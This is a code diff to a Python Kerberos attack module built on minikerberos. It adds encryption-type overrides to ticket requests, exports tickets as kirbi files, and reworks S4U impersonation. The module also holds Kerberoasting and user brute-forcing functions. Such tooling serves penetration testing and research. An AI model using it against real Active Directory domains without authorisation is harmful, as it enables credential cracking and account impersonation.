@@ -19,9 +19,10 @@ from minikerberos.common.target import KerberosTarget
 from minikerberos.common.keytab import Keytab
 from minikerberos.aioclient import AIOKerberosClient
 from minikerberos.common.utils import TGSTicket2hashcat
-from minikerberos.protocol.asn1_structs import AP_REQ, TGS_REQ, EncryptedData, KrbCredInfo, KRB_CRED, EncKDCRepPart
+from minikerberos.protocol.asn1_structs import AP_REQ, TGS_REQ, EncryptedData, KrbCredInfo, KRB_CRED, EncKDCRepPart, EncKrbCredPart
 from minikerberos.common.utils import print_table
 from minikerberos.common.ccache import CCACHE, Credential
+from minikerberos.common.utils import tgt_to_kirbi
 
 
 def process_target_line(target, realm = None, to_spn = True):
@@ -131,9 +132,12 @@ def kirbi_to_ccache(ccachefile, kirbi):
 	
 	cc.to_file(ccachefile)
 
-async def get_TGS(url, spn, out_file = None):
+async def get_TGS(url, spn, out_file = None, override_etype = None):
 	try:
 		logger.debug('[KERBEROS][TGS] started')
+		if isinstance(override_etype, int):
+			override_etype = [override_etype]
+
 		ku = KerberosClientURL.from_url(url)
 		cred = ku.get_creds()
 		target = ku.get_target()
@@ -144,18 +148,24 @@ async def get_TGS(url, spn, out_file = None):
 		kcomm = AIOKerberosClient(cred, target)
 		await kcomm.get_TGT()
 		logger.debug('[KERBEROS][TGS] fetching TGS')
-		tgs, encTGSRepPart, key = await kcomm.get_TGS(spn)
+		tgs, encTGSRepPart, key = await kcomm.get_TGS(spn, override_etype=override_etype)
+
+		kirbi = tgt_to_kirbi(tgs, encTGSRepPart)
 			
 		if out_file is not None:
-			kcomm.ccache.to_file(out_file)
-		logger.debug('[KERBEROS][TGS] done!')
-		return tgs, encTGSRepPart, key, None
-	except Exception as e:
-		return None, None, None, e
+			with open(out_file, 'wb') as f:
+				f.write(kirbi.dump())
 
-async def get_TGT(url):
+		logger.debug('[KERBEROS][TGS] done!')
+		return tgs, encTGSRepPart, key, kirbi, None
+	except Exception as e:
+		return None, None, None, None, e
+
+async def get_TGT(url, override_etype = None):
 	try:
 		logger.debug('[KERBEROS][TGT] started')
+		if isinstance(override_etype, int):
+			override_etype = [override_etype]
 		ku = KerberosClientURL.from_url(url)
 		cred = ku.get_creds()
 		target = ku.get_target()
@@ -165,14 +175,13 @@ async def get_TGT(url):
 
 		kcomm = AIOKerberosClient(cred, target)
 		logger.debug('[KERBEROS][TGT] fetching TGT')
-		await kcomm.get_TGT()
-
-		cred = kcomm.ccache.credentials[0]
-		kirbi, filename = cred.to_kirbi()
+		await kcomm.get_TGT(override_etype=override_etype)
 		
-		return kirbi, filename, None
+		kirbi = tgt_to_kirbi(kcomm.kerberos_TGT, kcomm.kerberos_TGT_encpart)
+
+		return kirbi, None
 	except Exception as e:
-		return None, None, e
+		return None, e
 
 async def brute(host, targets, out_file = None, show_negatives = False):
 	"""
@@ -270,7 +279,7 @@ async def spnroast(url, targets, out_file = None, etype = 23):
 	except Exception as e:
 		return None, e
 
-async def s4u(url, spn, targetuser, out_file = None):
+async def s4u(url, spn, targetuser):
 	try:
 		logger.debug('[KERBEROS][S4U] Started')
 		cu = KerberosClientURL.from_url(url)
@@ -285,7 +294,8 @@ async def s4u(url, spn, targetuser, out_file = None):
 			client = AIOKerberosClient(ccred, target)
 			await client.get_TGT()
 			logger.debug('[KERBEROS][S4U] Getting ST')
-			tgs, encTGSRepPart, key = await client.getST(target_user, service_spn)
+			res = await client.getST(target_user, service_spn)
+			tgs, encTGSRepPart, key = res
 		else:
 			logger.debug('[KERBEROS][S4U] Getting TGS via TGT from CCACHE')
 			for tgt, key in ccred.ccache.get_all_tgt():
@@ -293,7 +303,8 @@ async def s4u(url, spn, targetuser, out_file = None):
 					logger.debug('[KERBEROS][S4U] Trying to get SPN with %s' % '!'.join(tgt['cname']['name-string']))
 					client = AIOKerberosClient.from_tgt(target, tgt, key)
 
-					tgs, encTGSRepPart, key = await client.getST(target_user, service_spn)
+					res = await client.getST(target_user, service_spn)
+					tgs, encTGSRepPart, key = res
 					logger.debug('[KERBEROS][S4U] Sucsess!')
 				except Exception as e:
 					logger.debug('[KERBEROS][S4U] This ticket is not usable it seems Reason: %s' % e)
@@ -301,11 +312,9 @@ async def s4u(url, spn, targetuser, out_file = None):
 				else:
 					break
 
-		if out_file:
-			client.ccache.to_file(out_file)
-
 		logger.debug('[KERBEROS][S4U] Done!')
-		return tgs, encTGSRepPart, key, None
+		kirbi = tgt_to_kirbi(tgs, encTGSRepPart)
+		return tgs, encTGSRepPart, key, kirbi, None
 
 	except Exception as e:
-		return None, None, None, e
+		return None, None, None, None, e
